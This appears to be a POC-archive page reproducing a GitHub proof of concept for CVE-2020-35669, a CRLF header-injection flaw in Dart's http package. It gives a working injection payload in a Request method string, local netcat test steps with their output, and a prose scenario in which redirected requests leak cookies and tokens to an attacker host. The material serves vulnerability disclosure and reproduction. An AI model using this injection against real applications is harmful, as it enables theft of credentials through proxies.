POC详情: 936175a4e6d8326a2224fbcdf00b19ed0609de56

来源
https://github.com/n0npax/CVE-2020-35669
关联漏洞
标题: Google Http package For Dart 注入漏洞 (CVE-2020-35669)
描述:Google Http package For Dart是美国Google公司的一个用于Dart编程语言的Http支持代码库。 Google Http package For Dart 0.12.2版本及之前版本存在安全漏洞,如果攻击者控制了HTTP方法,且应用程序正在直接使用Request,则可以在HTTP请求中实现CRLF注入。
介绍
# [CVE-2020-35669](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35669)

## dummy server
please run dummy server using 1st terminal
```bash
sudo nc -l 127.0.0.1 80 
```

## apply given diff
```diff
diff --git a/main.dart b/main.dart
index 8c78291..a46f4d0 100644
--- a/main.dart
+++ b/main.dart
@@ -4,7 +4,7 @@ import 'package:http/src/request.dart';
 void main() async {
   var r = Request(
       "GET http://example.com/ HTTP/1.1\r\nHost: example.com\r\nLLAMA:",
-      Uri(scheme: "http", path: "/llama", host: "google.com"));
+      Uri(scheme: "http", path: "/llama", host: "localhost"));
   var rs = await r.send();
   var resp = await Response.fromStream(rs);
   print('${resp.body}');

```

## run dummy app
please execute `main.dart` using 2nd terminal
```bash
dart run main.dart
```

## result
nc should recieve given request
```http
GET HTTP://EXAMPLE.COM/ HTTP/1.1
HOST: EXAMPLE.COM
LLAMA: /llama HTTP/1.1
user-agent: Dart/2.10 (dart:io)
accept-encoding: gzip
content-length: 0
host: localhost
```

### Important piece of code
```dart
  var r = Request(
      "GET http://example.com/ HTTP/1.1\r\nHost: example.com\r\nLLAMA:",
      Uri(scheme: "http", path: "/llama", host: "google.com"));
  var rs = await r.send();
```

## Critical path

Assuming `diff` showed above was not applied and **user is behind `rev-proxy`** Website served by `example.com` was reached.
```bash
dart run main.dart
<!doctype html>
<html>
<head>
    <title>Example Domain</title>

    <meta charset="utf-8" />
    ...
    ... blah blah blah
    ...

```
### Why this is a security risk
If the developer is using Request to abstract generating HTTP calls and he's accepting a method param from the user, the user can do some magic like header injection or path forgery.
This can be exploited in many ways and seems to be quite important especially in case there is a reverse proxy is in place. A proxy may just pass someone's request to any host base on `host` header. 
Let's assume I'm replacing example.com with my-evil-uservice.org and the victim is working in a company behind the proxy. This means I can redirect calls with headers/cookies(tokens) and blah blah blah. Base on this, stealing calls with all headers/cookies can happen.
文件快照

 [4.0K]  /data/pocs/936175a4e6d8326a2224fbcdf00b19ed0609de56
├── [ 376]  main.dart
├── [1.8K]  pubspec.lock
├── [  98]  pubspec.yaml
└── [2.2K]  README.md

0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。